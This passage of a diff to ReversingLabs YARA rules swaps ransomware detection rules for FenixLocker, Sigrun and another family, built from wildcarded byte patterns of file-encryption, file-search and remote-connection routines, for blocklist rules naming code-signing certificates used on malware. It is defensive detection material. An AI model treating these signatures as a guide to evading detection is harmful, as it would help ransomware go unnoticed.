-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89
-            44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ??
-            ?? 0F 0B
-        }
-		$find_files = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ??
-            ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44
-            24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83
-            C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-		$remote_connection_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D
-            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ??
-            8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ??
-            8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D
-            ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89
-            48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
-            8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ??
-            ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40
-        }
-		$remote_connection_p2 = {
-            C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C
-            24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ??
-            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C
-            24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C
-            24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
-            8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C
-            24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8
-            ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Crossfire Industries, LLC" and pe.signatures [ i ] . serial == "07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FenixLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4868ced4-885d-548c-993c-ae25ab188172"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "445bb30e-e021-5a75-a47e-29fa567acfa5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12442-L12460"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FenixLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8
-            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ??
-            ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_2 = {
-            B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75
-            ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ??
-            ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85
-            C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40
-            3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B
-            C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83
-            C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ??
-            ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F
-            87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ??
-            ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ??
-            0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
-            ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
-            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
-            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ??
-            ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_3 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ??
-            72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F
-            82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F
-            84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ??
-            83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D
-            45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ??
-            ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B
-            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_4 = {
-            8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72
-            ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ??
-            F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D
-            41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50
-        }
-		$encrypt_files_5 = {
-            FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF
-            B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ??
-            40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ??
-            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3 ) or ( $encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures [ i ] . serial == "98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" ) and 1656547200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sigrun ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa627192-ed80-5115-a028-014f67f4571d"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "6c541522-98ab-5acb-af84-c005c9721e1f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12462-L12478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sigrun"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ??
-            ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF
-            75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ??
-            A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D
-            44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75
-            ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ??
-            8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54
-            24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74
